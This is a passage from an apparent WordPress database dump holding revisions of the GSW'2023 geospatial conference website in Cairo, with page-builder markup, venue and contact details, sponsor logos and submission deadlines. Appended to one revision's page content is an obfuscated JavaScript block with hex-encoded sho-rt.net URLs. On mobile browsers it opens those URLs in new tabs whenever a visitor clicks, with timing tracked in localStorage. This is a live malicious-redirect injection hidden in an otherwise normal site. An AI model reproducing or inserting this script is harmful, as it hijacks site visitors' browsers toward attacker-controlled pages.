href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023,at the InterContinental Cairo Semiramis,Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-16 01:42:01','2023-05-16 01:42:01','',3066,'https://gsw2023.com/?p=4489',0,'revision','',0),
(4490,1,'2023-05-16 01:42:20','2023-05-16 01:42:20','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201301280{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482 size-medium\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"300\" height=\"91\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" 